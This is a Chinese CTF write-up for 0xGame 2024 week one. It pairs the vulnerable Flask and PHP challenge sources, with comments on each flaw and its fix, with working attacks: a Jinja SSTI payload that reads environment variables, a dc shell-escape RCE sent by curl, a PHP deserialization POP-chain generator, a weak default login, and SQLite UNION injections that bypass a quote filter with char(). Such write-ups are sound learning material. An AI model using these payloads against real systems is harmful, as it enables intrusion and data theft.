0xgame 2024

meraklbz發表於2024-10-30

做不過來了，就跟著做了一點。

第一週

#### ez_ssti

from flask import Flask, request, render_template, render_template_string
import os
# Flask application object; the routes and error handler below register on it.
app = Flask(import_name=__name__)

# Read the flag once at import time, then try to drop it from the environment.
# NOTE: os.unsetenv() only calls the C-level unsetenv(); the os.environ mapping
# that Python populated at startup is not updated, so os.environ["flag"] still
# yields the value afterwards. os.environ.pop("flag", None) clears both.
flag = os.environ.get("flag")
os.unsetenv("flag")
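@app.route('/')
def index():
    """Serve this module's own source text (the challenge discloses its code).

    Returns:
        str: the contents of this file.
    """
    # Close the handle deterministically instead of leaving it to the GC.
    with open(__file__, "r") as src:
        return src.read()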


@app.errorhandler(404)
def page_not_found(e):
    """404 handler that echoes the requested URL back to the client.

    Args:
        e: the NotFound exception Flask passes in (unused).

    Returns:
        str: the rendered response body.
    """
    print(request.root_url)
    # The client-controlled URL is interpolated *before* the string reaches the
    # Jinja engine, so it is evaluated as template source: this is the SSTI
    # sink. The safe form passes it as a template variable instead, e.g.
    # render_template_string("The Url {{ url }} ...", url=request.url).
    message = "The Url {} You Requested Can Not Found".format(request.url)
    return render_template_string(message)

if __name__ == '__main__':
    # Dev server bound to all interfaces on port 8000.
    app.run(port=8000, host="0.0.0.0")

直接在 URL 後面新增

{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}

即可

#### ez_rce

from flask import Flask, request
import subprocess

# Flask application object; the routes below register on it.
app = Flask(import_name=__name__)

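@app.route("/")
def index():
    """Serve this module's own source text (the challenge discloses its code).

    Returns:
        str: the contents of this file.
    """
    # Close the handle deterministically instead of leaving it to the GC.
    with open(__file__) as src:
        return src.read()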

@app.route("/calc", methods=['POST'])
def calculator():
    """Run a POSTed dc(1) program and return its standard output.

    Returns:
        str: stdout of the dc process (stderr is captured but discarded).
    """
    # Fall back to a demo expression when the form field is missing or empty.
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    # The list form keeps the shell out of argument handling, but the
    # expression is still executed by dc as a program, and dc's command set
    # includes a shell-escape command, so the list form alone does not
    # confine it. A defensive version would validate the expression against
    # an allow-list of arithmetic tokens before running dc.
    completed = subprocess.run(
        ["dc", "-e", expression],
        capture_output=True,
        text=True,
    )
    return completed.stdout

if __name__ == "__main__":
    # Dev server bound to all interfaces on port 8000.
    app.run(port=8000, host="0.0.0.0")

直接 RCE

curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"

#### hello_web

簽到

#### hello_http

HTTP 題目

#### ez_unser

PHP 反序列化

<?php
// Show this file's own source to the visitor (the challenge discloses its code).
show_source(__FILE__);
class Man{
    private $name="原神,啟動";
    // Runs automatically on unserialize(); whatever is stored in $name is
    // string-cast by str_split(), which is what makes this the chain's entry.
    public function __wakeup()
    {
        $parts = str_split($this->name);
        echo $parts;
    }
}
class What{
    private $Kun="兩年半";
    // String conversion reads a property on $Kun; when $Kun is an object
    // that lacks that property, its __get() handler fires instead.
    public function __toString()
    {
        $kun = $this->Kun;
        echo $kun->hobby;
        return "Ok";
    }
}
class Can{
    private $Hobby="唱跳rap籃球";
    // Inaccessible-property read handler: dumps $Hobby. var_dump() on an
    // object consults that object's __debugInfo(). Returns nothing.
    public function __get($name)
    {
        $hobby = $this->Hobby;
        var_dump($hobby);
    }
}
class I{
    private $name="Kobe";
    // Consulted by var_dump(); calls say() on $name, so an object stored there
    // without a say() method reaches its __call() handler.
    public function __debugInfo()
    {
        $target = $this->name;
        $target->say();
    }
}
class Say{
    private $evil;
    // Catches any undefined method call and forwards it to $evil->Evil().
    public function __call($name, $arguments)
    {
        $sink = $this->evil;
        $sink->Evil();
    }
}
class Mamba{
    // Writes the raw POST field "content" into a timestamp-named .log file in
    // the working directory and prints that name. The content is not filtered,
    // so this is the file-write primitive of the chain.
    public function Evil()
    {
        $filename = time() . ".log";
        file_put_contents($filename, $_POST["content"]);
        echo $filename;
    }
}
class Out{
    // Renames a path under ./ to a POST-supplied destination. Only the literal
    // ".." in the source is substituted, and the destination $n is not
    // constrained at all, so the rename target is attacker-chosen.
    public function __call($name,$arguments)
    {
        $source = "./" . str_replace("..", "第五人格", $_POST["o"]);
        $destination = $_POST["n"];
        rename($source, $destination);
    }
}
// Untrusted POST data reaches unserialize() directly, so any class in this
// file can be instantiated with caller-chosen private properties and the
// magic methods above run during deserialization. Mitigation: do not
// unserialize user input; if unavoidable, pass ['allowed_classes' => false]
// (or an explicit list) and prefer a data-only format such as JSON.
$payload = $_POST["data"];
unserialize($payload);

鏈子從上往下就行，先寫個檔案，然後去改名。exp 如下：

<?php
// Echo this generator's own source before printing the payload.
show_source(__FILE__);
class Man
{
    private $name;

    /** Populate the private $name slot (serialized under the same key). */
    public function setname($name)
    {
        $this->name = $name;
    }
}
class What
{
    private $Kun;

    /** Populate the private $Kun slot (serialized under the same key). */
    public function setKun($Kun)
    {
        $this->Kun = $Kun;
    }
}
class Can
{
    private $Hobby;

    /** Populate the private $Hobby slot (serialized under the same key). */
    public function setHobby($Hobby)
    {
        $this->Hobby = $Hobby;
    }
}
class I
{
    private $name;

    /** Populate the private $name slot (serialized under the same key). */
    public function setname($name)
    {
        $this->name = $name;
    }
}
class Say
{
    private $evil;

    /** Populate the private $evil slot (serialized under the same key). */
    public function setevil($evil)
    {
        $this->evil = $evil;
    }
}
// Property-less stand-in; only the class name matters for serialization.
class Mamba
{
}
// Property-less stand-in; only the class name matters for serialization.
class Out
{
}
// Build the objects from the innermost one outwards and print the result.
// Swap in the commented line to produce the Out variant instead.
$mamba = new Mamba();
//$mamba = new Out();
$say = new Say();
$say->setevil($mamba);
$i = new I();
$i->setname($say);
$can = new Can();
$can->setHobby($i);
$what = new What();
$what->setKun($can);
$man = new Man();
$man->setname($what);
echo serialize($man);

#### ez_login

弱密碼，admin/admin123

#### ez_sql

SQLite 注入有黑名單，扔個 fuzz 看看，發現單雙引號被槍斃了。
沒有單雙引號，可以使用 char() 去拼湊字串。數字注入不用擔心閉合。
用 order by 判斷了列數為 5（雖然直接看也像是 5），然後構造 payload。

UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--